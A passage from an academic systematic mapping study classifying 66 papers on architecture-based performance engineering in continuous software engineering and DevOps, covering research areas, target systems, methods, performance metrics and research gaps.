& problem/contributions (M) \\ \cline{2-3} & \multirow{6}{*}{Contributions} & Performance analysis approach, Domain specific languages, & \#Secondary target \\ & & Continuous engineering framework, & problem/contributions (S) \\ \cline{3-3} & & Performance modelling approach, Tool support, & \#Main or Secondary target \\ \cline{3-3} & & Performance prediction approach, Self-adaptation. & problem/contributions (M, S) \\ \hline \multirow{6}{*}{RQ3} & \multirow{6}{*}{Methodologies} & Performance model, Model based engineering / & \\ & & Model driven engineering (MBEMDE), Performance & \\ \cline{3-3} & & antipattern / Root cause / Bottleneck detection, & \\ \cline{3-3} & & Performance prediction techniques, Performance analysis & \\ \cline{3-3} & & techniques, Parametric dependency, & \#Fully evaluated \\ \cline{3-3} & & Performance testing / Load Testing / Benchmarking, & indices/data/methods (F) \\ \cline{3-3} & & Performance model generation/extraction, Simulation, & \#Partially evaluated \\ \cline{3-3} & & Machine Learning, (Multi-objective) Optimization. & \\ \cline{3-3} & & Response time, Utilization, Throughput, Resource demand, & \#Fully or Partially evaluated \\ \cline{3-3} & & Network bandwidth, Memory / Memory Leaks. & indices/data/methods (F, P) \\ \cline{3-3} & & Used Data (input) & Runtime / Monitored, Workload, Requirements, & \\ \cline{3-3} & & Performance model, Software model, Data analytics. & \\ \hline \multirow{6}{*}{RQ4} & \multirow{6}{*}{Research area and Target system combined with data} & All keywords of RQ1 combined with specific keywords of RQ2 and RQ3. & \#Fully or Partially addressing \\ \cline{3-3} & & system combined with data & a specific combination \\ \cline{3-3} & & from RQ2 and RQ3 & of keywords (F, P) \\ \hline \hline \end{tabular} \end{table} Table 3: Classification framework: Data Extraction, Keywords, and Metrics adopted for the analysis. Keywords in blue have been obtained in the manual keyword refinement step. may just use a specific performance evaluation technique without contributing in that area. For each research area, we stacked two different bars to combine both the _fully_ and _partially investigated_ areas (as described in Section 3.4). As expected, the selected papers mainly focus on the areas of _software performance engineering_ (48 of \(66\) papers) and _software architecture_ (36 papers), which is in agreement with the information on publication venues obtained in the publication trends. On the 48 papers, 28 papers (14 fully) investigated both _software performance engineering_ and _software architecture_, that is, they offered a specific contribution in architecture-based performance engineering of software systems. More specifically, of the 28 papers, 14 papers (fully or partially) intensively used architectural/software models; some of them were devoted to model-based software engineering ([SP8], [SP63], [SP11], [SP14], [SP58], [SP9], [SP12], and [SP29]), and others are focused on model-driven software engineering ([SP48], [SP46], [SP53], [SP61], and [SP26]). Many studies have contributed to _continuous software engineering_ (38 papers). They considered at least one of the continuous dimensions introduced in Section 2, that is, continuous integration (8; [SP23], [SP8] [SP43], [SP11], [SP60], [SP57], [SP59], and [SP62]), continuous deployment (5; [SP53], [SP59], [SP30], [SP25], and [SP61]), continuous development (3; [SP59], [SP61], and [SP15]), continuous improvement (17; [SP4], [SP8], [SP23], [SP63], [SP40], [SP43], [SP11], [SP60], [SP57], [SP3], [SP53], [SP48], [SP22], [SP59], [SP62], [SP32], and [SP36]), and focused on CSE in general (10; [SP48], [SP22], [SP49], [SP59], [SP62], [SP24], [SP28], [SP37], [SP61], and [SP15]. Particular interest (31 papers)) was observed in regards to _continuous monitoring_ (hence, we decided to show it separately from the other continuous dimensions). _Nineteen_ papers focused on the areas: _software performance engineering_, _software architecture_ and _continuous software engineering_, implying that they not only considered methodology and techniques of the areas but also provided a scientific contribution to these areas; thus, they were positioned in the context of this topic. Moreover, 15 papers included a combination of _software performance engineering_, _software architecture_ and _continuous monitoring_. Only _nine_ of the selected papers covered _DevOps_ and only _five_ papers focused on the architectural support of performance engineering in the _agile_ development process. Of them, _three_ papers combined _software performance engineering_, _software architecture_ and _DevOps_ ([SP50], [SP62], and [SP61]), whereas _three_ papers combined _software performance engineering_, _software architecture_ and _agile_ ([SP8], [SP63], and [SP15]). For each area, the relationship between _fully_- and _partially_-_ investigated_ is proportional (i.e., a good percentage of the areas are fully investigated). However, only in regards to _continuous software engineering_, the number of papers partially investigating the area increases. ### Target systems Figure 8 describes the specific type of systems targeted (as case studies) by selected papers. These keywords are not meant to be mutually exclusive, in that a system could be, for example, at the same time a distributed and real-time one. We have basically identified, in each paper, the main characteristics of systems to which the paper approach/solutions have been (or can be potentially) applied, where they have been unambiguously identified. The main focus is on _software intensive systems_ (23 papers), such as systems of systems (SoS) ([SP43] and [SP19]), automotive software ([SP60]), and business process management ([SP8]). Similarly, a significant number of applications (23 papers) are in _component-based systems_ (_CBS_), and several papers focus on service-oriented architectures (SOA) ([SP12] and [SP17]) and microservices ([SP41] and [SP61]). In addition, _distributed systems_ (16 papers) have attracted considerable interest. However, a few of the paper cover _embedded systems_ (including _cyber physical systems_ (_CPS_) (7 papers) and _real-time systems_ (6 papers)). A new emerging application domain is related to big data and its management and analysis (_data intensive systems_; 7 papers). Concerning the relationship between the _fully_- and _partially_-_ investigated_ targets, it is observed that the larger targets (such as _intensive software systems_) are represented by several papers, which are only partially placed in that context. This may depend on the fact that more than one target may be assigned to each paper. For instance, [SP60] fully covers the domain of _CPS_, in particular automotive, and partially covers _intensive software systems_). In other cases, some papers do not offer a solution dedicated to a specific target but are placed in a more general manner, as in case of [SP32]. ### Discussion Significant attention has been paid to continuous monitoring of data to realize continuous development, delivery, and integration, which improve system performance at the level of SA. As the monitored data enable performance analysis, continuous monitoring represents a fundamental capability to provide CSE. In general, the results confirm that in the areas of SA and SP, Figure 8: Target systems - results Figure 7: Research areas - results CSE is an emerging topic that is progressively gaining the interest of researchers and practitioners. Existing conferences and systematic reviews on DevOps suggest that software engineering researchers have a strong interest in this topic. Despite this, only a few papers focuses on DevOps,underling an interesting gap to be addressed by the research community. However, the limited number of articles on agile is an expected result. Even as a precursor to DevOps, agile development is more code-focused and produces less documentation (e.g., software/design models), disabling SA-based SPE. Although a large number of selected papers have been fully identified as contributors to the CSE field, the number of papers that partially investigate this area has increased. Beyond that, several selected papers have not been placed within the context of CSE or DevOps, which can be attributed to the fact that these papers do not explicitly place themselves in these areas, even if they actually offer solutions that cover several aspects of an iterative development process, wherein updates are made continuously. However, this confirms that this emerging theme is gaining ground. With respect to the targets considered, component-based software and intensive software systems have been most investigated. These targets are characterized by the existence of different components, services, or subsystems. These can be independent of each other (e.g., micro services) or have strong dependencies and relationships amongst themselves and with the environment, as in many complex systems. However, in both cases, the presence of heterogeneous components makes it necessary to integrate these activities into continuous development and maintenance (e.g., DevOps). The component-based development paradigm is based on the concept of reuse within distinct components (e.g., services), enabling integration. Once integrated and implemented, these components must enter a continuous dimension, that is, to know and analyze the behavior after the integration and not only of the single component; therefore, they are also important in the context of performance. Next, the results show the targets of cloud and distributed systems, characterized by the technology stack and infrastructure complexity. Cloud nodes may attain performance orders of magnitude worse than other nodes [44]. For instance, if during the hosting of a mission-critical service or a scientific application, performance variability and availability become a concern, cloud monitoring is required to continuously measure and assess the infrastructure or application behavior (in terms of performance, reliability, power usage, and security) to adapt the system to changes or to apply corrective measures. Generally, we can observe that in open systems characterized by uncontrolled requests, continuous engineering, which supports their integration and evolution, is fundamental to identifying the occurrence of further problems not observed before. Finally, we note that more recent and innovative targets are not yet widely investigated. For instance, in the case of data-intensive systems, the massive use of big data and machine learning requires efficient management of resources, performance, and security. _Main findings:_ * Significant attention is paid to continuous monitoring of data, which represents a fundamental capability to provide CSE; * CSE and DevOps are gaining ground: most studies offer solutions covering several aspects of the iterative development process where updates are made continuously; * Software intensive systems, especially when component-based, are the most investigated ones: their heterogeneous components require the integration of their activities in a continuous development and maintenance; * More recent and innovative targets, such as cloud and data intensive systems, have not been widely investigated. ## 6 What and how performance problems have been addressed (RQ2) We classified the 66 selected papers by considering the target problems addressed by them (we divided the target problems in five categories) and their research contributions (we identified seven different types of contributions). In particular, the selected papers were thematically associated with at least one target problem and at least one research contribution based on their research directions and scope. We provide a detailed overview of the performance problems that have been addressed and illustrate them with exemplary papers. ### Research problems Figure 9 presents the problems targeted by the selected papers (**target problem**). The results obtained confirm that most of the selected papers (46 papers over 66) are focused on _performance evaluation_. They include methods and techniques aimed at evaluating or predicting the expected performance within a continuous (re-)engineering of the system. For instance, [1] presents an approach for continuous integration of performance model during agile development, by optimizing the learning of parametric dependencies; whereas [1] presents an approach that allows continuous performance adaptation through model predictive control. We can see that 22 selected papers aim to provide _QoS_, where the target is to satisfy different the requirements/properties for the overall quality of the system, including guaranteeing a certain level of performance. For instance, in [1], the authors Figure 9: Research problems - results proposed an approach for the automated extraction of quality-aware architecture models to explore the performance properties in design-time and runtime scenarios. In [14], the authors presented a method to apply the DevOps paradigm in the context of QoS-aware adaptive applications. In addition to performance, some of the selected papers provide specific support for other properties, such as availability ([14] and [14]), reliability ([14], [15], [16] and [17]), privacy ([15]), scalability and resilience ([14]). Moreover, 13 of these considered _resource allocation_. This is an expected outcome that is strictly related to our query. The problem of allocating resources is a great challenge during continuous development and operation and can severely impact the fast/frequent delivery of the team. For instance, in [14], resource profiles were used to detect (performance) changes in enterprise application versions and to support capacity planning for new deployment. In [14], performance models were extracted from the continuous monitoring of operational data, and then used to simulate performance metrics (resource utilization, response times, and throughput) and runtime costs of distributed and component-based applications. Furthermore, 11 selected papers addressed the _performance requirement_. Recently, with the increasing complexity of systems, high-performance requirements have become inevitable. For instance, [14] proposed a tool to discover secure architectural design options satisfying cost and performance requirements, while [14] proposed a performance-driven software refactoring approach to continuously assess and act with the aim of satisfying performance requirements. Notably, the mapping revealed that and _uncertainty_ is an emerging target problem (6 papers). These papers offered interesting solutions to evaluate and predict the performance of the system, even in uncertain conditions. These works considered different types of uncertainty that inevitably affect the accuracy of quality evaluations. External uncertainty stems from the complexity and unpredictability of the physical environment (as in [14] and [14]) and of the non-software-controlled parts (such as cloud networks [14]). Other papers ([14] and [15]) referred to both external and internal uncertainty, where the latter referred to the uncertainty stemming from the complexity of the software system itself (large codebases, multiple development teams, and diverse development practices and standards, etc.). A different characterization of the uncertainty has been described in [14], distinguishing uncertainty in parameters, models, code, and monitored data and providing a solution to detect violations of performance requirements in the DevOps process. ### Research contributions Figure 10 describes the principal **research contributions**. From our analysis, we can state that most of the studies contribute to the continuous performance assessment of the system with _performance analysis, performance modelling, and performance prediction_ approaches. In particular, _performance analysis_ approaches, including methods and tools that allow the analysis of performance during the continuous engineering of the system, have been proposed in 23 papers. For instance, [14] proposed a method for continuously assessing the performance requirements using the system architecture. In contrast, [14] proposed a performance analysis approach based on process mining. In addition, 23 papers proposed approaches that contributed in the process of modelling the performance of the system (_performance modelling_). For instance, [14] presented an UML profile for the design, quality assessment, and deployment of data-intensive applications, whereas [14] generated layered queuing networks for the performance analysis of data-intensive applications. Furthermore, 26 papers have proposed approaches for _performance prediction_. For instance, [14] proposed a model-based approach that was integrated into a continuous delivery pipeline, allowing to prediction of memory management and garbage collection behavior. In contrast, [14] proposed an approach of continuous assessment and adaptation through model predictive control. In addition, we identified 19 papers that considered _self-adaptation_, allowing continuously running software systems to operate in changing contexts while meeting their quality requirements. Most of the approaches use performance evaluation to achieve the desired QoS objectives in software systems. Such approaches aims to provide, for instance, re-configurable SAs ([14] and [14]), self-adaptive microservice architecture ([14]), or self-adaptation of performance parameters on the running system ([14] and [14]). In contrast, [14] presented a framework for self-adaptive monitoring to investigate the performance anomalies in component-based software systems. Notably, only [14] partially addressed self-adaptation under uncertain conditions. In particular, the authors modeled and analyzed the behavior and performance of Cloud systems to adaptively serve end-user requests, considering the uncertain behavior of resources and networks. A new research direction is emerging that is related to _domain specific languages_, for which we report only 9 selected papers out of the 66 considered. For example, [14] extended the hybrid architecture analysis and design language to support the modeling of environmental uncertainties and performed quantitative evaluations against various performance queries. In [14], the authors proposed a domain specific model approach to design, deploy, and monitor the performance quality in applications related to big data analytics. [14] proposed a domain-specific language that allowed for the modeling of workload specifications of session-based systems for load testing and performance prediction. A large number of papers (37) provides a _tool support_ to aid in performance engineering research. In addition, a considerable number of approaches have cosidered a _continuous engineering Figure 10: Research contributions - results _framework_ (27). Both _tool support_ and _continuous engineering framework_ are generally considered together along with other research contributions. For instance, [12] provided a tool support for the extraction of architectural performance models based on monitoring of log files, whereas [12] proposed a continuous engineering framework to automatically build and parameterize performance models for large scale enterprise systems. ### Discussion Most studies in this area are aimed at solving performance evaluation and assessment problems. This is a relevant goal in the development of modern systems, where increasingly agile paradigms require that performance analyses be in a continuous dimension to be effective. Notably, 22 papers were found to focus on QoS. Of them, 15 papers used a self-adaptation approach, implying that in 15 of the 18 papers, the self-adaptation approach targeted QoS rather than just performance. Managing the uncertainty of the system behavior is an emergent topic (papers addressing this issue are recent publications), and it is cross-cutting to the target problems previously mentioned. Although having the complete model of the system represents the ideal situation, in practice, only partial and limited measures are available. Consequently, specialized performance analysis or prediction techniques must work with uncertain knowledge. The proposed studies and their discussions on the different types of uncertainty highlight relevant issues and offer new research ideas. More than half of the target problems considered were addressed using the support of tools and were well partitioned between performance prediction, performance analysis, and performance modeling. The other target problems were dedicated to self-adaptation approaches and, to a lesser extent, domain specific languages. The latter result shows that few studies have exploited abstraction for continuous performance control, although they consider large heterogeneous runtime data. Raising the level of abstraction of the specification would favor increased automation and interoperability. Finally, in most studies (52 of 63 papers), support for CSE is provided by means of dedicated tools or frameworks. This is an interesting result, as in the context of this study, the quality and performance requirements demand the support of continuous engineering frameworks or dedicated tools. _Main findings:_ * Performance prediction, performance analysis and performance modelling have been further explored in order to offer adequate support in continuous developing; * A relevant number of self-adaptation approaches have been proposed to ensure the quality of services (including performance); * Quality and performance requirements demand for the support of continuous engineering frameworks or dedicated tools. ## 7 What instruments have been adopted (RQ3) Performance analysis can be conducted by adopting multiple techniques with different output-targeted metrics and with the support of different types of input data. In this section, we aim to identify the instruments that are adopted more often in the context of the study. ### Input data Figure 11(a) reports the input **data**. In regard to CSE, a system is continuously monitored to feed performance indices back into a performance model that supports predictive analyses. A total of 61 and 32 papers (of 66) used _runtime/monitored_ and _performance model_ as input data, respectively. Lesser number of papers consider the performance model as the input data because performance models have only been integrated in the last few years in software engineering processes. Whereas runtime performance assessment and fixing have long been considered as a common practices. Majority of the papers (34) that used monitored data also proposed a continuous approach to monitoring performance features and then used them mainly for analysis and prediction (e.g., [12], [13], [14], and [12]). In contrast, other studies applied simulation ([12]), system execution modelling [18] ([15]), and performance model generator leveraging execution data (e.g., [12]). However, papers that used performance model mainly adopted UML + MARTE (e.g., [12] and [12]), queuing network ([13], [14] and [15]) or the Palladio component model ([13] and [14]). On the 61 papers using runtime/monitored data, only \(five\) papers did not provide explicit information about it, while employing performance models. In particular, [13] considered changing the non-functional requirements and provided a method for continuously assessing the performance requirements using the system architecture. [13] proposed an approach for optimizing the performance, cost, and security in architectural design and it performed static analysis (i.e., using Taint analysis) for the identification of architecture-level vulnerabilities. [13] analyzed different and correlated QoS models, thereby reducing the overall uncertainty while continuously re-architecting the system. [13] proposed the use of performance unit testing to explore the performance characteristics and continuously detect potential performance problems throughout the development of a software system. [13] defined an approach to predict system performance based on the event-driven architecture modelling of the system interactions and impacts. A significant number of papers (14) considered the _software model_ as an input to the process. This is likely due to the different notations that are usually adopted for representing software models, preventing an automated full integration in the performance assessment task. The papers that considered _software model_ as input fully investigated this aspect in most cases; some of these studies ([13]) proposed automated techniques based on model transformations to develop _software model_ as a first-class artifact in the software engineering process. The results here also provide evidence that _data analytics_ have not yet been largely considered in this domain (9 papers, including [13], [SP41], and [SP21]). However, interest in data analytics has grown over time; thus, data analytics is expected to become a primary source of inputs in the next few years. For each input data point, the relationship between _fully_ and _partially investigated_ papers is proportional (a good percentage of the methodologies/techniques are fully investigated), with the exception of _software model_ mentioned above, and _data analytics_, for which the relatively high number of _partially investigated_ ones (_five_ over _nine_) is very likely due to the recent progress in the development of techniques for performance data analytics. ### Methodologies and techniques Figure 11(b) presents the **methodologies/techniques** used in the selected papers. As expected, teile majority of papers are focused on with _performance modeling_ (37 over \(66\)) and _performance analysis_ (32 over \(66\)). It is necessary to build and analyze models to address the performance issues early in the lifecycle, as confirmed by the fact that many of these papers intend to address this aspect ( [SP24],[SP56], and [SP55]). _Model based software engineering_ and _model driven engineering_ techniques were also widely considered (26 papers), as they did not restrict the adoption of models to the performance domain. However, in several cases, models were also considered (as first-class citizens) in the software engineering domain ([SP63], [SP48], and [SP14]). A considerable number of papers deal with _performance model extraction_ and _performance testing_ techniques (both 23 papers) which were typically adopted when studying performance issues on existing running software systems ([SP46] and [SP30]). Finally, it is observed that although in the last few years the adoption of _machine learning_ and _multiobjective optimization_ techniques has spread in diverse fields in the context of CSE, they are still marginally considered, as _six_ papers each focus on these techniques. For each methodology/technique, the relationship between the _fully_- and _partially-investigated_ is proportional (i.e., a good percentage of methodologies/techniques are fully investigated). Only in regards to _performance analysis_ the number of papers that partially investigates this methodology increases,as is the case with [SP62] and [SP32], which deal with Palladio component model and queueing networks. It is observed that this occurs despite the fact that _performance modeling_ is fully investigated. In certain contexts, extensive performance analysis can be difficult owing to the lack of system measurements and parameter values. Hence, in such cases, performance modeling can be fully investigated, but the analysis remains marginal among the contributions of the papers. ### Output measures and indices Figure 11(c) shows the targeted output **measures/indices**. The three typical performance indices, namely, _response time_ (40), _utilization_, (32) and _throughput_ (17), are the most widely targeted ones in the considered papers. Although, on one hand, this can be seen as an expected outcome, on the other hand it is somehow surprising that _memory_ (9) and _network bandwidth_ (8) have been significantly less studied in this context. These two measures may play crucial roles in the performance assessment of modern heterogeneous distributed software systems. Hence this result evidences a lack of investigation in this direction. These outputs are _fully investigated_. Hence, no realistic consideration can be made on the few _partially-investigated_ ones. A few papers have considered multiple types of measures ([SP39], [SP30], [SP31], and [SP12]). ### Discussion We have analyzed the selected papers with the consideration that an approach can be categorized into three elements: _input data_, _methodology/technique_, and _output measures/indices_. Not all selected papers clearly undergo this schema, but the results obtained provide some interesting insights into the combination frequencies of these three elements. Based on a straightforward observation of the results, it can be seen that _performance modeling_ and _analysis_ techniques that takes as input _runtime/monitored_ data and produce _response time_ and _utilization_ indices as output have received the most consideration (till date). This is a relevant confirmation of what is expected performance analysts must do in the context of CSE processes. However, it is unexpected that regardless of the technique adopted,_requirements_ and _data analytics_ rarely enter the process to target _memory_ and _network bandwidth_. This highlights a lack of investigation, which is crucial, especially in the domain of distributed heterogeneous software systems (CPS, edge computing, IoTT, and data-intensive systems). On the one hand, data analytics are ever more available and performance requirements are ever more stringent; on another hand, traditional performance measures (such as response time and utilization) in Figure 11: Data, methodologies/techniques, measures/indices - results isolation do not provide an integrated vision of the system performance behavior, which can suffer from performance degradation owing to a bad usage of memory and poor network connection. _Main findings:_ * Approaches of performance modeling and analysis techniques that take as input monitored data and produce response time and utilization indices as output are widely used methodologies. Requirements and data analytics rarely enter the process to target memory and network bandwidth; * Even if machine learning and multi-objective optimization techniques are being increasingly studied, they are still marginally considered in the context of CSE; * Model-based and model-driven techniques are widely considered, as they do not restrict the adoption of models to the performance domain, but in several cases, software models are also considered. ## 8 Current research gaps and future directions (RQ4) In this section, we aim at detecting potential research gaps by visualizing the number of papers that lie at the intersection of research areas and target systems for each keyword of interest. In the following section, we discuss our findings in the categories of keywords: _target problems_, _research contributions_, _used methodologies and techniques_, _used performance measures and indices_, and _input data_. To represents our results, we developed bubble plots, as described in Section 3. Moreover, we discuss the implications for future research based on the research gaps analyzed and future directions described in the selected papers. ### Target problems Figures 12 and 13 show the bubble plots for the _Performance evaluation_ and _Uncertainty_ target problems, respectively. The plots present a very different situation. Many studies have targeted problem of performance evaluation, especially in certain areas, and few papers have considered the uncertainty in general. A reason for this may be attributed to the fact that uncertainty has emerged only recently as a distinct concern in software engineering and its inclusion in continuous engineering practices is still very limited. In contrast, because the general problem of performance evaluation is specifically targeted by our study, a greater number of papers are expected to consider it from Figure 12, it is evident that certain research areas (continuous monitoring, DevOps, and agile) never intersect with certain target systems (real-time, embedded and CPS) when pursuing performance evaluation. This could simply be due to the scarce adoption of DevOps and agile practices in these systems. A further gap appears in the area of the development of software intensive systems, even if it is continuously evolving owing to the adoption of new technologies, such as cloud computing, IoT, and artificial intelligence; Continuous engineering and DevOps can benefit from new performance engineering solutions to achieve more pervasive software (for example in smart cities, smart manufacturing, and smart mobility). ### Research contributions Among several research contributions identified, we reported the plots for _continuous engineering framework_ (Figure 14) and _performance prediction_ (Figure 15) as we considered them to be relevant for the purposes of our study. In Figure 14, we observe that most of the papers proposing a novel continuous engineering framework are gathered in the lower half of the plot. The target systems for which most of these frameworks are designed are CBS/SOA/Microservices, software intensive systems, and distributed systems. Predictably, CSE is the most targeted research area in this field. However, continuous engineering frameworks are rarely or never proposed in real-time and embedded systems. Figure 15 shows that only a few papers proposed performance prediction approaches in embedded, real-time, and data-intensive systems. In addition, only three papers appear to focus both DevOps and agile. This may represent a research gap about Figure 12: Number of papers investigating the keyword _performance evaluation (target problem)_ at the intersection of research areas and target systems. Figure 13: Number of papers investigating the keyword _uncertainty (target problem)_ at the intersection of research areas and target systems. to be filled in the next few years because approaches based on artificial intelligence and machine learning, such as those in the AIOps [46] field, are rapidly emerging as a new way of modeling and predicting performance that can be more easily integrated with current DevOps practices. ### Input data The types of data that are used as input to the approaches play a significant role in establishing the situations in which an approach can be applied and the type of information required to initiate the process. _Workload_ (Figure 16) and _requirements_ (Figure 17) are the types of data, consideration of which appears to be related to the specific target system. For instance, while the workload is often considered in the _cloud_, _distributed_, and _CBS/SOA/microservices_ systems, it is almost never considered in _embedded_, _real-time_, and _data intensive_ systems. The lack of consideration of workload in embedded and real-time systems is expected, whereas in data intensive systems it presents a research opportunity. When considering the use of requirements, we are presented with a different situation. From the number of papers in the bubble plot, it appears that _DevOps_ and _agile_ do not put much emphasis on the requirements when assessing the performance; this is unexpected because they consider the specification of requirements in their processes. In addition, the _software intensive_ and _CBS/SOA/microservices_ systems often consider the requirements as the starting point for the development of performance engineering approaches. ### Methodologies and techniques The methodologies and techniques that are employed in the approaches of our study represent a compelling source of information for discovering the current research interests and gaps. For instance, when examining the use of performance models (Figure 18), it is clear that the DevOps and agile research areas lag behind the other areas in terms of the number of papers. A different picture is presented using performance testing, as shown in Figure 19. In this case, while all the research areas are almost equally represented, a lack of focus on the adoption of performance testing, load testing, and benchmarking is evident in the real-time and embedded systems, as the number of papers contributing to above mentioned aspects in the real time embedded systems are 0 and 3, respectively. Generation or extraction of a Figure 16: Input data - Workload Figure 17: Input data - Requirements Figure 14: Number of papers investigating the keyword _continuous engineering framework (research contribution)_ at the intersection of research areas and target systems. Figure 15: Number of papers investigating the keyword _performance prediction (research contribution)_ at the intersection of research areas and target systems. performance model (Figure 20) is a special use case in the adoption of performance models. Therefore, unsurprisingly, we can still count a few papers in the DevOps and agile research areas, whereas distributed and microservice systems seem to rely the most on the automated generation of performance models. Finally, in regard to the use of simulation (shown in Figure 21), we observed that, in contrast to other methodologies, simulation has been employed in several papers for real-time and embedded systems. In addition, DevOps and agile appear to be less represented than in other research areas. study. Even more interesting is the fact that _DevOps_ and _agile_ seem to not consider memory at all in any target system. We expect memory use to become critical as ML and data-intensive systems continue to increase. In contrast, response time is considered more often in general and in particular in the domains of _distributed systems_, _software intensive systems_, and _CBS/SOA/incroservices_. This paints a picture in which performance measures that impact the quality of service are the foremost concern in research related to CSE, thus resulting in a substantial gap in the investigation of issues related to memory usage and how these can affect the cost of providing a service. ### Discussion on research gaps As is evident from the results reported previously in Section 8, there is a noticeable difference in the coverage between the more established and emerging research topics. A more general performance evaluation topic is a clear example. It is among the most investigated topics in our study, not only because it is understandably at the center of our inquiry, but also because it is a well-established research topic with a history spanning decades. Nonetheless, when the same topic is combined with more recent trends in the software industry, such as agile and DevOps, it clearly lags behind with respect to the number of papers covering it. Apart from the obvious reason that more recent topics possibly receive less coverage in research, a more compelling justification can be found in the specific characteristics of agile processes and practices. In fact, agile cycles are usually considerably short on time as the main focus of such cycles is possibly the fast release of new features. While some tests, such as acceptance tests from the product owner, are understandably required before releasing a new feature, performance tests are usually not necessary as they are often very demanding in terms of the time and resources. A possible solution might be to classify new requirements with low and high performance priority and contemplate dedicating a considerable budget to performance analysis and testing. Similarly, the specific needs of cloud-native systems do not always align with the requirements of performance evaluation. Most cloud-native systems adopt continuous tracing tools (Jaeger, OpenTelemetry, and AppDynamics) that record execution traces in highly distributed and dynamic environments. Such tools may allow performance analysis to be conducted as they usually provide additional information that is relevant to the performance, such as the execution time of remote calls. However, companies do not conduct performance analytics on distributed traces until performance does not compromise the user experience. Continuous assessment and improvement of performance are still not considered as prior quality tasks leading to software systems and services that quickly degrade their performance [47]. This leads us to believe that a subsequent study that considers the industry (a multivocal literal review) may be of interest. In contrast to agile, DevOps, and cloud, the topic of uncertainty in software engineering has been relevant for some time. Even so, it still represents an emerging topic in research, especially when considering performance evaluation in uncertain settings. Evaluating performance while maintaining uncertainty is inherently difficult. The characteristics of software systems are becoming more dynamic owing to many factors: they are more distributed because they are moving on the cloud or are composed of third-party software, they are open to a wider group of users, and more importantly, they are expected to provide QoS guarantees in ever-changing environments. In this context, performance evaluation must consider fluctuating workloads and great variability in resource demands, posing more challenges to the accuracy and validity of the prediction and analysis of performance results over time. To address this problem, researchers have started to study software performance under uncertainty, and our study finds that this is a research area not yet sufficiently investigated, but that may possess great growing potential. Figure 23: Output measures / indices - Memory / Memory Leaks Figure 22: Output measures / indices - Response time _Main findings:_ * Although performance evaluation is a very well established research topic, the conjunction with the latest trends in the software industry, such as agile and DevOps, is clearly overdue. * Researchers have started to study software performance under uncertainty. The research area has not yet been sufficiently investigated, but may possess a great growing potential. * There is no evidence of the experience of companies in conducting performance analytics on cloud systems. ### Implication for future research In this section we discuss the implications of this study and challenges for future research. #### 8.7.1 Towards a culture of quality in CSE The results obtained suggest an interest in a culture of quality, indicating that analysis and verification occur early in the CSE pipeline (as for testing in DevOps), making it easier to discover and fix defects with a collaborative approach to product improvement. In order to bring up the quality characteristics of software (architecture) and its continuous improvement (and re-architecting), QoS analysis must become an integrated activity in the entire lifecycle of software development lifecycle, which requires continuous exposure of quality characteristics exposed to analysis ([11] and [12]). As discussed earlier, most of the selected studies focused on a few of the performance properties. However, there is a need to strengthen the support for various properties in both performance and, in general, software quality during the continuous engineering of the system. Some challenging quality aspects to consider are: verification of correctness properties, such as architectural mismatches ([11]), evaluation of the architectural runtime models with respect to fidelity ([21, 22]) and usefulness for human inspection ([12]), extending the scalability by considering influencing factors such as variation in the complexity of user behavior in experiments [12], supporting state management and resource provisioning mechanism [11], and introducing time consumption for memory allocation and release operations to increase the prediction quality of the model [11]. Similarly, other QoS properties, such as the reliability [11], consistency [11], safety and security, and availability [12] can be modeled and analyzed in a CSE framework. #### 8.7.2 Performance engineering benefits in DevOps DevOps is gaining widespread adoption in industry. However, its principles of rapid changes, development automation, and fast feedback loop (often relying on dynamic cloud environments) conflict with the complexity of the current performance engineering approaches [18]. Thus, performance engineering frameworks should be improved for adoption in rapidly changing systems. The structures and behaviors of the modern systems changes frequently and requires continuous relearning of the failure models in order to retain the prediction quality [11]. Moreover, these systems are characterized by a continuous stream of available data. Performance models should be built periodically, incrementally, or even continuously, and be triggered by changes to components in the monitored environment. Models can be quickly rebuilt once a potential problem is detected using only the most recent data only, and then used to compare with previous model results [11]. #### 8.7.3 Data-driven methods and Machine Learning Performance and load tests produce a large amount of data that can be difficult to analyze. Data-driven methods provide powerful insights into optimizing performance, building new features, and preventing problems with services, especially in distributed (enterprise) applications, in-memory databases, and big data systems [11]. Despite developments in modern software engineering technology, there is no established methodology for systematically employing performance engineering and data-driven engineering in continuous development. In addition, performance evaluation based on machine learning can become an integral part of the continuous engineering process [11]. The performance model must learn autonomously and improve itself during system operation in a production environment [11]. #### 8.7.4 Continuous controlling system uncertainty As discussed in Sections 6 and 8, uncertainty has been addressed marginally in the papers selected in this study. However, both in academia and industry, significant attention is paid to the contexts characterized by a high degree of uncertainty. To reduce uncertainty and obtain feedback on products/software as soon as possible, it is important to test assumptions and hypotheses in short cycles [10]. Continuous monitoring and frequent re-assessment and re-architecting are necessary to reduce the uncertainty in CSE and DevOps [11]. An efficient analysis method can be used to propagate the effect of uncertain parameters in software systems and calculate the robustness of the performance indices, thereby enhancing the flexibility in addressing uncertainty ([11]). #### 8.7.5 Integration and abstraction A recurring issue is the need to integrate methods and tools into the continuous and DevOps pipelines. Hence, it is necessary to design and develop performance engineering approaches that can be integrated with other tools and methods used in the context of this study [11]. Continuous monitoring is a fundamental process in CSE. In the context of implications for future research, further investigation on adaptive monitoring and analysis infrastructure that can automatically update the system and performance/quality models is needed ([11], [11], [12], [13] and [11]). External capabilities can be integrated using approaches to represents systems as black-box components by integrating black-box monitoring techniques [14], or creating resource profiles describing specific enterprise applications (using standard measurement solutions), instead of relying on a custom solution to collect the required data [13]. This can be improved by supporting the collection of arbitrary information on the status of the monitored application, which requires the system integration of the corresponding type on a dynamic basis [13]. Using a higher abstraction level can help reduce the integration efforts. Future research can target the development of a model-based framework that considers the definition of (domain-specific) languages and automation mechanisms to ensure, by design, the potential for the monitoring, analysis, testing, and simulation in CSE. As discussed above, machine learning-supported and data-driven approaches can be used to (continuously) learn and tune the models. #### 8.7.6 Implications for practitioners and researchers Practitioners can benefit from the presented results to understand how software performance engineering and software architectural can support practices in CSE and DevOps. Moreover, they can benefit from the classification of methodologies applicable to architectural support for performance engineering in the context of continuous software development. Researchers can benefit from our results to understand research trends and research gaps, and to better focus on their future work. In particular, the software performance community can leverage this work to understand whether their approaches are applicable in a CSE/DevOps context. Moreover, this study helps them define the requirements that drive the development of their tools to increase the chances of industrial adoption. In contrast, researchers in the field of CSE/DevOps can identify which methodologies and techniques can help improve software performance at some stage in the development cycle. _Main findings:_ * There is a growing interest for a culture of quality, where quality properties are continuously exposed to analysis and verification during the software development life-cycle; * The complexity of the current performance engineering approaches should improve their suitability for the DevOps principles of rapid changes, development automation, and fast feedback loop; * There is a need for an established methodology for the systematically employment of performance engineering and machine learning/data-driven engineering in continuous development; * Continuous monitoring and frequent re-assessment and re-architecting 